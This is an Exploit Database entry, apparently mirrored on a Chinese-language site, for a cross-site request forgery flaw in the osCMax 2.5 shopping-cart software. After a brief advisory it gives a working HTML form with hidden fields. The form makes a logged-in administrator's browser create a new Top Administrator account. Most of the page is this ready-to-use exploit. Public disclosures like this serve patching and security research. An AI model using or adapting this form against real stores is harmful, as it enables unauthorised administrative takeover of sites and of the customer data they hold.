osCMax 2.5 – Cross-Site Request Forgery

• Exploit Database
• 18 阅读

• 作者： TUNISIAN CYBER
  日期： 2014-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39118/

• source: https://www.securityfocus.com/bid/66272/info
  
  osCmax is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.
  
  Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
  
  <html>
  <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
  <input type="hidden" name="admin_username" value="THETUNISIAN"/>
  <input type="hidden" name="admin_firstname" value="Moot3x"/>
  <input type="hidden" name="admin_lastname" value="Saad3x"/>
  <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
  <input type="hidden" name="admin_groups_id" value="1"/>
  <!-- About "admin_groups_id" -->
  <!-- 1= Top Administrator -->
  <!-- 2= Customer Service-->
  <input type='submit' name='Submit4' value="Agregar">
  </form>
  </html>